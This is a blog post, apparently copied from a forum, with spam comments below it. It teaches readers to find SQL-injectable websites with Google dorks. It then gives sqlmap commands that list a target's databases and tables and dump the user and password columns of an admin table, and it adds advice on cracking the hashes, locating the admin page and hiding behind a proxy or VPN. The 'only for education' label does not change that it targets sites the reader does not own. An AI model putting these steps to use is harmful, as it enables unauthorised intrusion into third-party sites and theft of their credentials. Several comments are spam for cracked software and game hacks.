/ / / HACK WEBSITE USING SQLMAP | KALI LINUX - BACKTRACK (Only For Education)

HACK WEBSITE USING SQLMAP | KALI LINUX - BACKTRACK (Only For Education)

15 Comments ,
    

Introduction
[*]Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. This is all about sqlmap. 
Now follow my steps to hack a website using sqlmap.

Step 1
[*]Find Sql vulnerable site. 
I will give you some dorks which may help you finding websites vulnerable to Sql Injection.
Code:
]inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=

Step 2

[Image: image1_zps1ba326d9.jpg]

And press enter. If error appears like on the image below it means the website is vulnerable. 

[Image: image2_zpsffcf021f.jpg]


(I'm not going to explain advanced ways to check the website for sql vulnerabiities because there are plenty of tutuorials about that on CHF)

Ok, so we found the target. Now let's go ahed.

Step 3
[*]Injection
Type this command in the terminal and hit enter like on the image below:
Code:
sqlmap -u "www.yourtaget.com/page.php?id=1" --dbs
(Insert the url that we checked for Sql Vulnerability)

[Image: image3_zps85f6aa32.jpg]


Now we will get the database name of the website.

[Image: image4_zps29fa4d64.jpg]


We got the two database ohridhot_ohrid
and information_schema we will select ohridhot_ohrid
database.

Let's get the tables of that database.
For that we need to enter this command on terminal and after that hit Enter. 
Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid --tables

[Image: image5_zpsf83a99b1.jpg]


Now we will get the tables list which is stored in the database we selected.

[Image: image6_zps002b2bf8.jpg]


Now lets grab the columns from the admin table , type on terminal:
Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid -T admin --columns

Now we got the columns and we got user and pass like on the image below

[Image: image7_zpsfb061ca9.jpg]


Now let's grab the user and pass
Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid -T admin -C user,pass --dump

[Image: image8_zpsc0a432ae.jpg]

Now we have to decrypt the hash , there are also tutorial about hash decryption on CHF.
The only thing which is left now is to find the admin page and remember to use Proxy/Vpn !

[*]Directory of sqlmap on Kali Linux
Places -> Computer -> Filesystem -> usr -> share -> sqlmap -> output


That's all , I hope you enjoyed the tutorial. 

Source:- alltricks007.blogspot.in

SHARE

About the Author: Roni Mondal

About Roni Mondal : Beyond blogging and digital marketing , Roni Mondal is an entrepreneur at heart who has made his hobby turned passion. Becoming a blogger, It was the most important part of his journey.
    Blogger Comment
    Facebook Comment

15 comments:

  1. Unknown11 September 2015 at 02:48

    such a fantastic posting! thanks a lot for nice article.
    cracked software download

    ReplyDelete
  2. Unknown15 September 2015 at 22:25

    thank you.

    ReplyDelete
  3. Unknown28 December 2015 at 04:16

    Jharkhand Labour Department Recruitment 2016


    Well written and useful stuff you share with us. I want more this kind of information from you......

    ReplyDelete
  4. blog1 January 2016 at 01:01

    its very useful for the how to hack website.
    sarkari result

    ReplyDelete
  5. Anonymous11 March 2016 at 04:36

    Hello sir
    i have passed my matriculation and searching for 10th Pass jobs 2016. please suggest me complete details about Sarkari Naukri 2016 after 10th class or upcoming govt 10th pass jobs 2016

    ReplyDelete
  6. Unknown14 January 2017 at 20:57

    You can search govt jobs Sarkari Result click here.

    ReplyDelete
  7. Reshma25 January 2017 at 02:34

    Sarkari Recruitment is one of the biggest Indian Job Site so here you will getCONCOR Jobs

    2017    so

    ReplyDelete
  8. Unknown13 February 2017 at 15:49

    Continue looking for the protect. Other than contributing the metro surfer coins, regardless you have to discover your way around. download subway surfers hack

    ReplyDelete
  9. Star17 June 2017 at 11:10

    If error appears like on the image below it means the website is vulnerable.
    email check

    ReplyDelete
  10. Mo Blogger22 June 2017 at 07:03

    You will also be able to read more about the developments of HTML 5, including game development, lessons, how to use cannabis and more. With these lessons, if they are actually games, making them much more interactive and helping you to learn more about HTML 5 game development faster and easier.text bomber

    ReplyDelete
  11. Unknown2 August 2017 at 07:27

    Android games had an advantage over the rest of Google Play categories, during the first quarter of 2013, both in terms of downloads and as well as revenue gained. Summoners War Hack Cydia

    ReplyDelete
  12. Koshal31 August 2017 at 05:13

    Nice

    ReplyDelete
  13. Anonymous31 August 2017 at 21:06

    Download now the GATE 2018
    Notification from here

    ReplyDelete
  14. Alex moner12 September 2017 at 05:00

    An immense moonlike of commendation, reserve it up.Johnny Chen SEO Austin

    ReplyDelete

Subscribe to: Post Comments ( Atom )